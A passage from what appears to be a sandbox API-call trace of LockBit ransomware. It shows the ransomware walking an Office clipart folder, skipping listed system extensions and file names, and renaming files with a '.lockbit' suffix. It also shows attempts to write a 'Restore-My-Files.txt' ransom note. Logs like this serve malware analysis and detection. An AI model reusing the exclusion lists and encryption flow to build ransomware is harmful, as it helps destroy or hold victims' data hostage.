lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.385] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02120_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02120_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.390] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.390] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.391] free (_Block=0x1fa2ed8) [0167.391] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02120_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.391] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.391] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.391] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1fc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02169_.WMF", cAlternateFileName="")) returned 1 [0167.391] lstrcmpiW (lpString1=".", lpString2="PE02169_.WMF") returned -1 [0167.391] lstrcmpiW (lpString1="..", lpString2="PE02169_.WMF") returned -1 [0167.391] PathFindExtensionW (pszPath="PE02169_.WMF") returned=".WMF" [0167.391] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.391] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.391] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.392] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.393] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.393] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02169_.WMF") returned 1 [0167.394] lstrcmpiW (lpString1="ntldr", lpString2="PE02169_.WMF") returned -1 [0167.394] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02169_.WMF") returned -1 [0167.394] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02169_.WMF") returned -1 [0167.394] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02169_.WMF") returned -1 [0167.394] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02169_.WMF") returned 1 [0167.394] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02169_.WMF") returned -1 [0167.394] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.394] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02169_.WMF") returned=".WMF" [0167.394] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.394] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.394] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.395] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.395] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02169_.WMF.lockbit") returned 72 [0167.395] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02169_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0167.401] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.401] malloc (_Size=0x40068) returned 0x3d70450 [0167.401] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8132) returned 1 [0167.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0167.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0167.402] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.404] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02169_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02169_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.404] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.405] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.406] free (_Block=0x1fa2ed8) [0167.406] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02169_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.406] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.406] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.406] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8378b700, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8378b700, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x75e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02262_.WMF", cAlternateFileName="")) returned 1 [0167.406] lstrcmpiW (lpString1=".", lpString2="PE02262_.WMF") returned -1 [0167.406] lstrcmpiW (lpString1="..", lpString2="PE02262_.WMF") returned -1 [0167.406] PathFindExtensionW (pszPath="PE02262_.WMF") returned=".WMF" [0167.407] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.407] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.408] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.408] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02262_.WMF") returned 1 [0167.408] lstrcmpiW (lpString1="ntldr", lpString2="PE02262_.WMF") returned -1 [0167.408] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02262_.WMF") returned -1 [0167.408] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02262_.WMF") returned -1 [0167.408] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02262_.WMF") returned -1 [0167.408] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02262_.WMF") returned 1 [0167.408] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02262_.WMF") returned -1 [0167.409] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.409] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF") returned=".WMF" [0167.409] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.409] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.409] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.410] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.410] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.410] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF.lockbit") returned 72 [0167.410] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02262_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.411] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.411] malloc (_Size=0x40068) returned 0x3e70008 [0167.411] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=30178) returned 1 [0167.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0167.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0167.414] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0167.419] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.419] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.419] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.420] free (_Block=0x1fa2ed8) [0167.420] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.420] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.420] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb983d700, ftCreationTime.dwHighDateTime=0x1bf148e, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb983d700, ftLastWriteTime.dwHighDateTime=0x1bf148e, nFileSizeHigh=0x0, nFileSizeLow=0x824e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02263_.WMF", cAlternateFileName="")) returned 1 [0167.420] lstrcmpiW (lpString1=".", lpString2="PE02263_.WMF") returned -1 [0167.420] lstrcmpiW (lpString1="..", lpString2="PE02263_.WMF") returned -1 [0167.420] PathFindExtensionW (pszPath="PE02263_.WMF") returned=".WMF" [0167.420] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.421] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.422] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.422] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.423] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02263_.WMF") returned 1 [0167.423] lstrcmpiW (lpString1="ntldr", lpString2="PE02263_.WMF") returned -1 [0167.423] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02263_.WMF") returned -1 [0167.423] lstrcmpiW 